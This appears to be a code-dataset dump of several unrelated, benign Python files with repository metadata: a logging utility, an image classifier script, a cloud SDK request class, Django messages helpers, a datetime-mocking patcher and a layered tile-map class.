| column | type | values / lengths |
| --- | --- | --- |
| hexsha | string | lengths 40 to 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | lengths 3 to 972 |
| max_stars_repo_name | string | lengths 6 to 130 |
| max_stars_repo_head_hexsha | string | lengths 40 to 78 |
| max_stars_repo_licenses | sequence | lengths 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | lengths 24 to 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | lengths 24 to 24, nullable |
| max_issues_repo_path | string | lengths 3 to 972 |
| max_issues_repo_name | string | lengths 6 to 130 |
| max_issues_repo_head_hexsha | string | lengths 40 to 78 |
| max_issues_repo_licenses | sequence | lengths 1 to 10 |
| max_issues_count | int64 | 1 to 116k, nullable |
| max_issues_repo_issues_event_min_datetime | string | lengths 24 to 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | lengths 24 to 24, nullable |
| max_forks_repo_path | string | lengths 3 to 972 |
| max_forks_repo_name | string | lengths 6 to 130 |
| max_forks_repo_head_hexsha | string | lengths 40 to 78 |
| max_forks_repo_licenses | sequence | lengths 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | lengths 24 to 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | lengths 24 to 24, nullable |
| content | string | lengths 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
b621588455e5d76a0ba73fb71140693684704279 | 9,532 | py | Python | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | 1 | 2021-09-24T16:15:57.000Z | 2021-09-24T16:15:57.000Z | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | null | null | null | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import logging
import os
import sys
import time
import warnings
import inspect
from functools import wraps
# from inspect import getcallargs, getfullargspec
from collections import OrderedDict
from collections.abc import Iterable
from itertools import chain
__all__ = ['redForegroundText', 'greenForegroundText', 'line_break','clear_screen','set_cursor','setup_custom_logger', 'default_logger', 'log_to', 'tracelog', 'suppress_stdout_stderr']
__trace__ = False
__filter__ = None
__DEBUG__ = False
class colors:
'''Colors class:
Reset all colors with colors.reset
Two subclasses fg for foreground and bg for background.
Use as colors.subclass.colorname.
i.e. colors.fg.red or colors.bg.green
Also, the generic bold, disable, underline, reverse, strikethrough,
and invisible work with the main class
i.e. colors.bold
'''
reset='\033[0m'
bold='\033[01m'
disable='\033[02m'
underline='\033[04m'
reverse='\033[07m'
strikethrough='\033[09m'
invisible='\033[08m'
class fg:
black='\033[30m'
red='\033[31m'
green='\033[32m'
orange='\033[33m'
blue='\033[34m'
purple='\033[35m'
cyan='\033[36m'
lightgrey='\033[37m'
darkgrey='\033[90m'
lightred='\033[91m'
lightgreen='\033[92m'
yellow='\033[93m'
lightblue='\033[94m'
pink='\033[95m'
lightcyan='\033[96m'
class bg:
black='\033[40m'
red='\033[41m'
green='\033[42m'
orange='\033[43m'
blue='\033[44m'
purple='\033[45m'
cyan='\033[46m'
lightgrey='\033[47m'
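# Illustrative usage sketch (added comment, not part of the original module),
# showing the combination pattern the docstring above describes; only names
# defined in the colors class are used:
#
#     print(colors.fg.red + 'error text' + colors.reset)
#     print(colors.bold + colors.bg.green + 'highlighted' + colors.reset)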
class filterlogger:
def __init__(self, logger=None):
self._logger = logger
@property
def logger(self):
return self._logger
@property
def level(self):
return self.logger.level
@property
def isDebugging(self):
global __DEBUG__
return __DEBUG__
@level.setter
def level(self, level):
self.logger.setLevel(level)
@staticmethod
def getlogger(logger):
global __filter__
# if __filter__ is not None:
return filterlogger(logger=logger)
# else:
# return logger
def debug(self, e, exc_info=False):
global __filter__
line = str(e)
global __DEBUG__
if __DEBUG__:
frame = inspect.stack()[1]
filename = (frame[0].f_code.co_filename).rsplit('/', 1)[1]
components = str(frame).split(',')
line = '{} - {} - {}\n{}'.format(filename, components[5],components[6] , line)
if __filter__ is None:
self.logger.debug(line, exc_info=exc_info)
return
if __filter__ in line.upper():
self.logger.debug(line, exc_info=exc_info)
def info(self, line):
global __filter__
if __filter__ is None:
self.logger.info(line)
return
if __filter__ in line.upper():
self.logger.info(line)
def warn(self, line):
global __filter__
if __filter__ is None:
self.logger.warn(line)
return
if __filter__ in line.upper():
self.logger.warn(line)
def error(self, line):
self.logger.error(line)
def setLevel(self, level):
self.logger.setLevel(level)
def critical(self, line):
self.logger.critical(line)
def addHandler(self, hdl):
self.logger.addHandler(hdl)
def removeHandler(self, hdl):
self.logger.removeHandler(hdl)
def setup_custom_logger(name, levelname=logging.DEBUG, trace=False, log_file_path='logs.log', filter=None):
trace_formatter = logging.Formatter(fmt='\n%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(module)s - %(funcName)s - %(lineno)d\n%(message)s\n')
console_info_formatter = logging.Formatter(fmt='\n%(levelname)s - %(filename)s(%(funcName)s - %(lineno)d)\n%(message)s\n')
global __trace__
__trace__ = trace
global __filter__
__filter__ = filter if filter is None else filter.upper()
logger = logging.getLogger(name)
logger.setLevel(levelname)
consolehandler = logging.StreamHandler()
consolehandler.setFormatter(console_info_formatter if levelname == logging.INFO else trace_formatter)
consolehandler.setLevel(levelname)
logger.addHandler(consolehandler)
if levelname == logging.DEBUG:
filehandler = logging.FileHandler(log_file_path)
filehandler.setFormatter(trace_formatter)
filehandler.setLevel(levelname)
logger.addHandler(filehandler)
global __DEBUG__
__DEBUG__ = True
logger.debug('Logging started. Filter:{}'.format(filter))
if trace:
tracelogger = logging.getLogger('nseta_file_logger')
tracelogger.setLevel(levelname)
tracelogger.addHandler(consolehandler)
if levelname == logging.DEBUG:
tracelogger.addHandler(filehandler)
logger.debug('Tracing started')
# Turn off pystan warnings
warnings.simplefilter("ignore", DeprecationWarning)
warnings.simplefilter("ignore", FutureWarning)
return logger
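# Minimal setup sketch (added for illustration, not in the original file); the
# logger name 'nseta' matches what default_logger() below looks up, and the
# log file path is an arbitrary example value:
#
#     logger = setup_custom_logger('nseta', logging.DEBUG, trace=False,
#                                  log_file_path='/tmp/nseta.log', filter=None)
#     default_logger().debug('pipeline started')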
def default_logger():
return filterlogger.getlogger(logging.getLogger('nseta'))
def file_logger():
return filterlogger.getlogger(logging.getLogger('nseta_file_logger'))
def trace_log(line):
global __trace__
if __trace__:
default_logger().info(line)
else:
file_logger().info(line)
def flatten(l):
"""Flatten a list (or other iterable) recursively"""
for el in l:
if isinstance(el, Iterable) and not isinstance(el, str):
for sub in flatten(el):
yield sub
else:
yield el
def getargnames(func):
"""Return an iterator over all arg names, including nested arg names and varargs.
Goes in the order of the functions argspec, with varargs and
keyword args last if present."""
(args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations) = inspect.getfullargspec(func)
return chain(flatten(args), filter(None, [varargs, varkw]))
def getcallargs_ordered(func, *args, **kwargs):
"""Return an OrderedDict of all arguments to a function.
Items are ordered by the function's argspec."""
argdict = inspect.getcallargs(func, *args, **kwargs)
return OrderedDict((name, argdict[name]) for name in getargnames(func))
def describe_call(func, *args, **kwargs):
yield "Calling %s with args:" % func.__name__
for argname, argvalue in getcallargs_ordered(func, *args, **kwargs).items():
yield "\t%s = %s" % (argname, repr(argvalue))
def log_to(logger_func):
"""A decorator to log every call to function (function name and arg values).
logger_func should be a function that accepts a string and logs it
somewhere. The default is logging.debug.
If logger_func is None, then the resulting decorator does nothing.
This is much more efficient than providing a no-op logger
function: @log_to(lambda x: None).
"""
if logger_func is not None:
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
global __DEBUG__
if __DEBUG__:
frame = inspect.stack()[1]
filename = (frame[0].f_code.co_filename).rsplit('/', 1)[1]
components = str(frame).split(',')
func_description = '{} - {} - {}'.format(filename, components[5],components[6])
description = func_description
for line in describe_call(func, *args, **kwargs):
description = description + '\n' + line
logger_func(description)
startTime = time.time()
ret_val = func(*args, **kwargs)
time_spent = time.time() - startTime
logger_func('\n%s called (%s): %.3f (TIME_TAKEN)' % (func_description, func.__name__, time_spent))
return ret_val
else:
return func(*args, **kwargs)
return wrapper
else:
decorator = lambda x: x
return decorator
tracelog = log_to(trace_log)
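# Usage sketch for the decorator above (illustrative only, not original code);
# the wrapped function name is made up:
#
#     @tracelog
#     def fetch_quote(symbol, retries=3):
#         ...
#
# When debug logging has been enabled via setup_custom_logger(), each call is
# logged with its argument values and the time taken, routed through
# trace_log() to either the console logger or the file logger.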
# def timeit(method):
# def timed(*args, **kw):
# ts = time.time()
# result = method(*args, **kw)
# te = time.time()
# if 'log_time' in kw:
# name = kw.get('log_name', method.__name__.upper())
# kw['log_time'][name] = int((te - ts) * 1000)
# else:
# print ('%r %2.2f ms' % \
# (method.__name__, (te - ts) * 1000))
# return result
# return timed
class suppress_stdout_stderr(object):
'''
A context manager for doing a "deep suppression" of stdout and stderr in
Python, i.e. will suppress all print, even if the print originates in a
compiled C/Fortran sub-function.
This will not suppress raised exceptions, since exceptions are printed
to stderr just before a script exits, and after the context manager has
exited (at least, I think that is why it lets exceptions through).
'''
def __init__(self):
# Open a pair of null files
self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
# Save the actual stdout (1) and stderr (2) file descriptors.
self.save_fds = [os.dup(1), os.dup(2)]
def __enter__(self):
# Assign the null pointers to stdout and stderr.
os.dup2(self.null_fds[0], 1)
os.dup2(self.null_fds[1], 2)
def __exit__(self, *_):
# Re-assign the real stdout/stderr back to (1) and (2)
os.dup2(self.save_fds[0], 1)
os.dup2(self.save_fds[1], 2)
# Close the null files
for fd in self.null_fds + self.save_fds:
os.close(fd)
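# Context-manager sketch (illustrative, not part of the original module); the
# noisy_native_call name is hypothetical:
#
#     with suppress_stdout_stderr():
#         noisy_native_call()   # prints from compiled extensions are silenced too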
def line_break(): print("-"*25)
def clear_screen(): os.system('clear' if os.name =='posix' else 'cls')
def set_cursor(): sys.stdout.write('\033[F')
def redForegroundText(text): print('\n'+ colors.fg.red + text + colors.reset)
def greenForegroundText(text): print('\n' + colors.fg.green + text + colors.reset)
| 31.150327 | 184 | 0.661771 |
e3db15d16bca89ff525584f8b8074451dfed98bc | 935 | py | Python | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | 1 | 2020-06-30T17:47:44.000Z | 2020-06-30T17:47:44.000Z | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | null | null | null | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | 4 | 2017-05-12T08:30:29.000Z | 2020-10-28T01:22:13.000Z | from test_imagenet import classify_image
import os
import sys
sys.path.insert(0, 'Scrapbook/python_scripts')
import superclass as sc
image_extensions = ["jpg", "jpeg", "png", "bmp"]
album_superclass_map = {
'animal' : 'Animal',
'person' : 'Person',
'location' : 'Places',
'vehicle' : 'Vehicles',
'sport' : 'Sports',
'geological_formation' : 'Outdoor',
'musical_instrument' : 'Musical Instruments',
'plant' : 'Nature',
'electronic_equipment' : 'Electronic Gadgets',
'misc' : 'Miscellaneous',
}
def classify_folder(dirpath):
    for image in os.listdir(dirpath):
        if image.split(".")[-1] in image_extensions:
            print(image)
            top_pred, out_label_preds = classify_image(dirpath + "\\" + image)
            print('Image : {} , Label : {}'.format(image, top_pred['label'][1]))
            print('Superclass : ', sc.getSuperClass(top_pred['label'][1]))
classify_folder(r'G:\Hackathon\deep-learning-models\images\awsome') | 31.166667 | 70 | 0.675936 |
70fcdb0aa6074134073e1e94115d181f397bd394 | 1,967 | py | Python | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | liuzheng/aliyun-openapi-python-sdk | 1ba6743f3d6f2cef57ec9e3be1754b04293c3150 | [
"Apache-2.0"
] | 1 | 2021-03-08T02:59:17.000Z | 2021-03-08T02:59:17.000Z | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | bricklayer-Liu/aliyun-openapi-python-sdk | 20da2554de22679fc7c5462c483663e4d79512aa | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | bricklayer-Liu/aliyun-openapi-python-sdk | 20da2554de22679fc7c5462c483663e4d79512aa | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdrds.endpoint import endpoint_data
class ModifyRdsReadWeightRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Drds', '2017-10-16', 'ModifyRdsReadWeight','Drds')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Weights(self):
return self.get_query_params().get('Weights')
def set_Weights(self,Weights):
self.add_query_param('Weights',Weights)
def get_DrdsInstanceId(self):
return self.get_query_params().get('DrdsInstanceId')
def set_DrdsInstanceId(self,DrdsInstanceId):
self.add_query_param('DrdsInstanceId',DrdsInstanceId)
def get_InstanceNames(self):
return self.get_query_params().get('InstanceNames')
def set_InstanceNames(self,InstanceNames):
self.add_query_param('InstanceNames',InstanceNames)
def get_DbName(self):
return self.get_query_params().get('DbName')
def set_DbName(self,DbName):
self.add_query_param('DbName',DbName) | 35.125 | 80 | 0.766141 |
2566d71238257b6a248ca6c6388a66f21e1ac38e | 3,091 | py | Python | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2017-08-30T06:46:16.000Z | 2017-08-30T06:46:16.000Z | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2018-07-23T12:13:04.000Z | 2018-07-23T12:13:04.000Z | from django.contrib.messages import constants
from django.contrib.messages.storage import default_storage
from django.http import HttpRequest
__all__ = (
'add_message', 'get_messages',
'get_level', 'set_level',
'debug', 'info', 'success', 'warning', 'error',
'MessageFailure',
)
class MessageFailure(Exception):
pass
def add_message(request, level, message, extra_tags='', fail_silently=False):
"""
Attempts to add a message to the request using the 'messages' app.
"""
if not isinstance(request, HttpRequest):
raise TypeError("add_message() argument must be an HttpRequest object, "
"not '%s'." % request.__class__.__name__)
if hasattr(request, '_messages'):
return request._messages.add(level, message, extra_tags)
if not fail_silently:
raise MessageFailure('You cannot add messages without installing '
'django.contrib.messages.middleware.MessageMiddleware')
def get_messages(request):
"""
Returns the message storage on the request if it exists, otherwise returns
an empty list.
"""
return getattr(request, '_messages', [])
def get_level(request):
"""
Returns the minimum level of messages to be recorded.
The default level is the ``MESSAGE_LEVEL`` setting. If this is not found,
the ``INFO`` level is used.
"""
storage = getattr(request, '_messages', default_storage(request))
return storage.level
def set_level(request, level):
"""
Sets the minimum level of messages to be recorded, returning ``True`` if
the level was recorded successfully.
If set to ``None``, the default level will be used (see the ``get_level``
method).
"""
if not hasattr(request, '_messages'):
return False
request._messages.level = level
return True
def debug(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``DEBUG`` level.
"""
add_message(request, constants.DEBUG, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def info(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``INFO`` level.
"""
add_message(request, constants.INFO, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def success(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``SUCCESS`` level.
"""
add_message(request, constants.SUCCESS, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def warning(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``WARNING`` level.
"""
add_message(request, constants.WARNING, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def error(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``ERROR`` level.
"""
add_message(request, constants.ERROR, message, extra_tags=extra_tags,
fail_silently=fail_silently)
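# Typical view-level usage of the helpers above (illustrative sketch, not part
# of this module; the view name is made up):
#
#     from django.contrib import messages
#
#     def save_profile(request):
#         ...
#         messages.success(request, 'Profile updated.')
#         ...
#
# The stored messages are then read back, e.g. via get_messages(request) or
# the messages context processor, when the next response is rendered.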
| 30.303922 | 80 | 0.671304 |
329d994b6b9046c508ed0f0e2fe03bf2c4677882 | 70 | py | Python | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | a,b,c,d = (int(input())
for _ in range(4))
print (pow(a,b)+pow(c,d))
| 17.5 | 25 | 0.557143 |
c747b46ab44ae3c928fff206bff2ae841f39a6b3 | 48 | py | Python | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | print("user 1")
print("user 2")
print("user 3")
| 12 | 15 | 0.625 |
387856b7a4490524f1bb322b4a429821bb6ba9ac | 4,881 | py | Python | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 38 | 2017-08-01T07:57:40.000Z | 2021-11-17T04:55:29.000Z | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 32 | 2017-07-09T18:46:07.000Z | 2020-07-30T06:31:40.000Z | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 7 | 2017-07-22T07:44:29.000Z | 2020-07-28T14:13:13.000Z | """A patch to the datetime module."""
from .base_patcher import BasePatcher
import sys
import datetime
try:
import copy_reg as copyreg
except ImportError:
import copyreg
_real_datetime = datetime.datetime
_real_date = datetime.date
def with_metaclass(meta, name, *bases):
"""Create a base class with a metaclass."""
return meta(name, bases, {})
class DateSubclassMeta(type):
"""Date mock metaclass to check instancechek to the real class."""
@classmethod
def __instancecheck__(mcs, obj):
return isinstance(obj, _real_date)
class DatetimeSubclassMeta(DateSubclassMeta):
"""Datetime mock metaclass to check instancechek to the real class."""
@classmethod
def __instancecheck__(mcs, obj):
return isinstance(obj, _real_datetime)
def date_to_fakedate(date):
"""Return mocked datetime object from original one."""
return FakeDate(date.year,
date.month,
date.day)
def datetime_to_fakedatetime(datetime):
"""Return mocked datetime object from original one."""
return FakeDatetime(datetime.year,
datetime.month,
datetime.day,
datetime.hour,
datetime.minute,
datetime.second,
datetime.microsecond,
datetime.tzinfo)
class FakeDate(with_metaclass(DateSubclassMeta, 'date', _real_date)):
"""Mocked datetime.date class."""
def __new__(cls, *args, **kwargs):
"""Return a new mocked date object."""
return _real_date.__new__(cls, *args, **kwargs)
@classmethod
def today(cls):
"""Return today's date."""
result = cls._now()
return date_to_fakedate(result)
FakeDate.min = date_to_fakedate(_real_date.min)
FakeDate.max = date_to_fakedate(_real_date.max)
class FakeDatetime(with_metaclass(DatetimeSubclassMeta, 'datetime',
_real_datetime, FakeDate)):
"""Mocked datetime.datetime class."""
def __new__(cls, *args, **kwargs):
"""Return a new mocked datetime object."""
return _real_datetime.__new__(cls, *args, **kwargs)
@classmethod
def now(cls, tz=None):
"""Return a datetime object representing current time."""
now = cls._now()
if tz:
result = tz.fromutc(now.replace(tzinfo=tz)) +\
datetime.timedelta(hours=cls._tz_offset())
else:
result = now
return datetime_to_fakedatetime(result)
@classmethod
def today(cls):
"""Return a datetime object representing current time."""
return cls.now(tz=None)
@classmethod
def utcnow(cls):
"""Return a datetime object representing current time."""
result = cls._now()
return datetime_to_fakedatetime(result)
FakeDatetime.min = datetime_to_fakedatetime(_real_datetime.min)
FakeDatetime.max = datetime_to_fakedatetime(_real_datetime.max)
def pickle_fake_date(datetime_):
"""Pickle function for FakeDate."""
return FakeDate, (
datetime_.year,
datetime_.month,
datetime_.day,
)
def pickle_fake_datetime(datetime_):
"""Pickle function for FakeDatetime."""
return FakeDatetime, (
datetime_.year,
datetime_.month,
datetime_.day,
datetime_.hour,
datetime_.minute,
datetime_.second,
datetime_.microsecond,
datetime_.tzinfo,
)
class DatetimePatcher(BasePatcher):
"""Patcher of the datetime module.
patching:
- datetime.today
- datetime.now
- datetime.utcnow
- date.today
"""
def __init__(self, **kwargs):
"""Create the patcher."""
super(DatetimePatcher, self).__init__(patcher_module=__name__,
**kwargs)
FakeDate._now = self._now
FakeDatetime._now = self._now
def get_patched_module(self):
"""Return the actual module obect to be patched."""
return datetime
def get_patch_actions(self):
"""Return list of the patches to do."""
return [
('date', _real_date, FakeDate),
('datetime', _real_datetime, FakeDatetime)
]
def start(self):
"""Change pickle function for datetime to handle mocked datetime."""
super(DatetimePatcher, self).start()
copyreg.dispatch_table[_real_datetime] = pickle_fake_datetime
copyreg.dispatch_table[_real_date] = pickle_fake_date
def stop(self):
"""Return pickle behavior to normal."""
copyreg.dispatch_table.pop(_real_datetime)
copyreg.dispatch_table.pop(_real_date)
super(DatetimePatcher, self).stop()
def _now(self):
return _real_datetime.fromtimestamp(self.clock.time)
| 27.268156 | 76 | 0.625282 |
97b14b8948d01a780558bcaf02220cee031de9a3 | 11,207 | py | Python | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | """A map with different layers."""
import json
from traceback import print_exc
from sys import stdout
def pretty_json(data, level=0, indent=4):
"Pretty print some JSON."
content = ''
if isinstance(data, dict):
content += '{\n'
level += 1
count = 0
for key, val in data.items():
content += ' ' * indent * level + '"' + str(key) + '": '
content += pretty_json(val, level, indent)
count += 1
if count == len(data):
level -= 1
content += '\n'
content += ' ' * indent * level + '}'
else:
content += ',\n'
if len(data) == 0:
level -= 1
content += ' ' * indent * level + '}'
elif isinstance(data, list):
list_in_list = False
for val in data:
if isinstance(val, list):
list_in_list = True
break
content += '['
level += 1
count = 0
if list_in_list:
content += '\n'
for val in data:
if list_in_list:
content += ' ' * indent * level
content += pretty_json(val, level)
count += 1
if count == len(data):
level -= 1
if list_in_list:
content += '\n' + ' ' * indent * level
content += ']'
else:
content += ', '
if list_in_list:
content += '\n'
if len(data) == 0:
level -= 1
content += ' ' * indent * level + ']'
elif isinstance(data, str):
content += '"' + data + '"'
elif isinstance(data, bool):
content += "true" if data else "false"
elif isinstance(data, int):
content += str(data)
elif isinstance(data, float):
content += str(data)
else:
raise Exception('Type unknown: ' + data.__class__.__name__)
return content
class Obj:
def __init__(self, name, attributes):
self.name = name
self.attr = attributes
def __str__(self):
return f"<Obj {self.name}>"
class Layer:
"A class representing a layer of the map."
@staticmethod
def create_matrix(max_col: int, max_row: int, default: int = 0):
"Static method for creating a matrix, a list of rows."
matrix = []
for _ in range(max_row):
row = []
for _ in range(max_col):
row.append(default)
matrix.append(row)
return matrix
def __init__(self, mymap: str, name: str, default: int, obj : Obj = None):
self.map = mymap
self.name = name
self.default = default
self.content = Layer.create_matrix(self.map.width,
self.map.height,
default)
self.prototype = obj
self.objects = []
def is_object_layer(self):
"This layer is an object layer."
return self.prototype is not None
def resize(self):
"Resize a layer."
old = self.content
self.content = Layer.create_matrix(self.map.width,
self.map.height,
self.default)
for row in range(min(len(old), self.map.height)):
for col in range(min(len(old[0]), self.map.width)):
self.content[row][col] = old[row][col]
def get(self, row: int, col: int):
"Return int at row, col."
return self.content[row][col]
def set(self, val, row: int, col: int):
"Set val at row, col. val can be int or dict"
prev = self.content[row][col]
if not isinstance(prev, int):
self.objects.remove(prev)
self.content[row][col] = val
if not isinstance(val, int):
self.objects.append(val)
return {'name': self.name, 'row': row, 'col': col,
'prev': prev, 'next': val}
def to_json(self):
"Return a JSON representation of the layer."
res = {
"default": self.default
}
if self.is_object_layer():
res['object'] = self.prototype.name
res['content'] = self.objects
else:
res['content'] = self.content
return res
class Map:
"A class representing a map/level/floor."
@staticmethod
def get_mod(filepath):
"Get the mod of a map from a JSON file."
file = open(filepath, mode='r', encoding='utf8')
data = json.load(file)
file.close()
return data['mod']
@staticmethod
def from_json(app, filepath):
"Load a map from a JSON file."
file = open(filepath, mode='r', encoding='utf8')
data = json.load(file)
file.close()
a_map = Map(app, data["name"], data["width"], data["height"])
for name, lay in data["layers"].items():
obj = None
if 'object' in lay:
obj = app.mod.layers[name].obj
a_map.add_layer(name, lay["default"], obj)
if 'object' in lay:
# populate with the objects
for obj in lay['content']:
a_map.layers[name].content[obj['y']][obj['x']] = obj
a_map.layers[name].objects.append(obj)
else:
# replace with the content saved
a_map.layers[name].content = lay["content"]
a_map.filepath = filepath
a_map.modcode = data["mod"]
return a_map
def __init__(self, app, name: str, max_col: int, max_row: int):
self.app = app
self.modcode = app.mod.code if app is not None and \
app.mod is not None else 'undefined'
self.name = name
self.layers = {}
self.width = max_col
self.height = max_row
self.filepath = None
def resize(self, width, height):
"Resize a map and all its layers."
self.width = width
self.height = height
for _, lay in self.layers.items():
lay.resize()
    def info(self):
        "Display info on the map."
        print(repr(self))
        if len(self.layers) == 0:
            print('No layer in map')
            return
        for name, lay in self.layers.items():
            print('<' + name + '>')
            if lay.prototype is not None:
                print(" type =", lay.prototype)
            print(' ', end='')
            print(*lay.content, sep='\n ')
            if lay.prototype is not None:
                for idx, obj in enumerate(lay.objects):
                    print(f"{idx:5d} : {obj}")
def add_layer(self, name, default: int = 0, obj: str = None):
"Add a layer to a map."
if not isinstance(default, int):
msg = f'[ERROR] Only integer value not {default.__class__.__name__}'
raise Exception(msg)
if name in self.layers:
msg = f'[ERROR] Layer {name} already exists.'
raise Exception(msg)
self.layers[name] = Layer(self, name, default, obj)
def has_objects(self, name):
"The layer name is an object layer."
return self.layers[name].is_object_layer()
def check(self, row, col, layer=None):
"Check row, col and layer if not None."
if layer is not None and layer not in self.layers:
return False
#raise Exception(f"[ERROR] Layer {layer} not defined.")
if not 0 <= row < self.height:
return False
#raise Exception(f"[ERROR] Out of row: {row} / {self.height}")
if not 0 <= col < self.width:
return False
#raise Exception(f"[ERROR] Out of col: {col} / {self.width}")
return True
def get(self, row, col, layer=None):
"Get value at row, col in layer."
self.check(row, col, layer)
if layer is not None:
return self.layers[layer].get(row, col)
res = {}
for _, lay in self.layers.items():
res[lay.name] = lay.get(row, col)
return res
def set(self, val, row, col, layer):
"Set value at row, col in layer."
self.check(row, col, layer)
return self.layers[layer].set(val, row, col)
def set_name(self, name):
"Set the name of the map."
self.name = name
def __repr__(self):
mod_name = self.app.mod.code if self.app is not None and \
self.app.mod is not None else ''
return f"{self.name} {self.width}x{self.height}" + \
f"[{len(self.layers)}]{mod_name}"
def to_json(self):
"Return a JSON representation of the map."
data = {
"name": self.name,
"width": self.width,
"height": self.height
}
data["mod"] = self.app.mod.code if self.app is not None and \
self.app.mod is not None else ''
data["layers"] = {}
for _, lay in self.layers.items():
data["layers"][lay.name] = lay.to_json()
return data
def save(self, filepath):
"Save to a file."
file = open(filepath, mode='w', encoding='utf8')
file.write(pretty_json(self.to_json()))
file.close()
try:
file = open(filepath, mode='r', encoding='utf8')
json.load(file)
file.close()
except json.JSONDecodeError:
print('Something went wrong when trying to load map. Map may be corrupted.')
print('Stack info:')
print_exc(file=stdout)
self.filepath = filepath
if __name__ == '__main__':
# Create matrix tests
L5X10 = Layer.create_matrix(5, 10)
print(*L5X10, sep='\n')
# Map and layer tests
A_MAP = Map(None, "A map", 4, 4)
A_MAP.info()
A_MAP.add_layer('ground', 0)
A_MAP.info()
A_MAP.set(5, 3, 3, 'ground')
A_MAP.info()
A_MAP.resize(7, 7)
A_MAP.info()
# Pretty json tests
A_DICT = {'a': 5, 'b': True, 'c': 3.14}
print("1:")
print(pretty_json(A_DICT))
